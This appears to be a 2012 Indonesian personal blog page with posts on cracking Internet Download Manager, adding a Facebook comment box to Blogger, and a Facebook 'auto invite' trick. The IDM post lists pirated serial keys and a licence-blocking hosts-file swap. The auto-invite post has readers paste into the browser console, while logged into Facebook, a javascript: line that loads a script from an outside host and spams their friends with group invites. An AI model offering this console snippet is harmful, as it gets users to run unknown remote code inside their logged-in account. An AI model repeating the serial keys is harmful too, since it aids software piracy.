This is My cars

biasanya aku naik ini kalo pas berangkat sekolah ke MAN 1 Jember ku yang tercinta

Ini mobilnya adekku

Meskipun Adekku masih keil,tapi dia udah pintar nyetir Mobil lho...

My Favorite Car

Ini dia,Mobil yang paling aku suka.tiap 3 hari skali gue mandiin dan tiap sore gue bawa jalan-jalan di Pasar Tanjung ^_^

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Kamis, 16 Agustus 2012

Cara agar IDM menjadi full version (no crack no patch)

hai,(akyra lagi-akyra lagi)
kali ini saya akan posting mengenai  cara IDM agar tidak pernah update/agar idm tidakminta registrasi terus


oke langsung ke tutorialnya

-pertama download dulu IDMnya DI SINI ato Di Sini
-trus ente instal tuh sopler(bahasa anak binus),
-next,setelah selesai peng installan klik register (sambungan internet harus tidak ada sama sekali,kalo erlu cabut sekalian LAN/Modemmu)
-masukan first name, last name, dan email terserah kita
-lalu masukkan serial number di bawah ini (pilih satu aja),:
                  
    1B0C2-NOGKB-AH0DH-W8R3C
    S89JW-J3KDR-KBHW5-RMQ8H
    QVD3H-ZY9K1-GW94Z-XOLQS
    1XL56-8BB1L-TTQII-89DFX
    X33SI-6BW37-SQG4D-FGN8M
    1O6SO-LOOFL-ZFW66-EIF97
    UXX3S-9N0NT-M74X0-DESMI
    W3J5U-8U66N-D0B9M-54SLM
    EC0Q6-QN7UH-5S3JB-YZMEK
    GZLJY-X50S3-0S20D-NFRF9

klik OK
- Buka windows explorer, cari file bernama hosts di C:\WINDOWS\system32\drivers\etc\hosts
- replace File hosts dengan file hosts ini Download
-selesai dah,idm ente gk akan pernah ke update,jika pengen update harus lewat link mirror yg banyak bertebaran di dunia maya ^_^

password rar : www.vengeance96.blogspot.com

Cara memasang Kotak Komentar Facebook di Blog


Hai,Akyra kembali lagi nih....(kyk abis dari mana aja...)
kali ini saya akan posting bagaimana cara membuat kotak komentar yang notabene itu milik facebook


oke karena saya bukan tipe orang mudah basa basi,langsung aja ke triknya


  • Log in ke account blogger
  • Pilih desain selanjutnya pilih edit html dan klik lanjutkan
  • Jangan lupa centang Expand Template Widget
  • Sekarang cari kode <b:includable id='status-message'> dan diatas kode tersebut sobat akan menemukan kode ini </b:includable>
  • Copy kode dibawah ini
<b:if cond="data:blog.pageType == &quot;item&quot;"> <div id='fb-root'/>
<script src='http://connect.facebook.net/en_US/all.js#xfbml=1'/>
<fb:comments expr:href='data:post.url' num_posts='5' width='500'/>
</b:if>
  • Letakkan kode tersebut diatas kode </b:includable>
  • ganti tulisan yang berwarna kuning itu dengan ukuran kotak komentar yg kamu inginkan
  • Selanjutnya klik save dan lihat hasilnya.

udah ku coba ini lho...
liat aja sendiri :D

disadur secara kalem dari : Blog teman

script maho versi auto invite member ke dalam grup

malam ini Akyra akan posting hasil Copas'an Akyra dari blog teman akyra

pertama silahkan sobat buka mozila/google chrome sobat lalu login facebook setelah itu silahkan sobat gabung ke dalam group ini untuk praktek supaya tidak terjadi kesalahan nantinya 
https://www.facebook.com/groups/456435237722083/ silahkan gabung dulu supaya praktek bisa sukses gan masih anget scripnya ...hehehehe dengan sobat tes scrip ini di grup tersebut supaya tidak ada kesalahan nantinya untuk praktek d grup sobat...hehehe

kalu sudah sobat buka group yang tadi lalu sobat tekan CTRL+SHIFT+K (mozilla)setelah itu agan masukan script ini 
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://duniamaya1.wap.sh/autoinvite2012';})(); 
ke dalam kotak kecil; sesuai ss di bawah ini 

kalau sobat sudah mengikuti intruksi yang saya kasih silahkan tekan enter lalu tunggu sampai loading selesai baru sobat reload browser sobat dream cyber comunity :D di jamin sobat nambah ganteng deh ...hhehehehehehe
 kalau SS nya kurang jelas silahkan sobat klik ss nya untuk memperbesar gambar......
jika masih bingung juga silahkan sobat tanya ke dalam group tersebut atau tinggalkan komentar sobat disini ...hehehehehe
sekian coretan sinchankeke ganteng tentang scrip maho versi auto invet member ke dalam group facebook...jika ada salah salah kata mohon di maafkan yah :D gunakan tutor ini sebijak mungkin karena belum tentu teman2 facebook sobat senang dengan di inbet secara paksa :D

sumber : Blog teman

*update



kalo di mozilla kan pake CTRL+Shift+K
nah kalo di google chrome pake ini


1. Klik Kanan
2. Pilih Inspect Element and Console
3. Masukkan deh kode skrip tadi ^_^

simple

simple

tam hu

free counters
DON'T FORGET FOLLOW ME AND LEAVE YOUR COMMENT!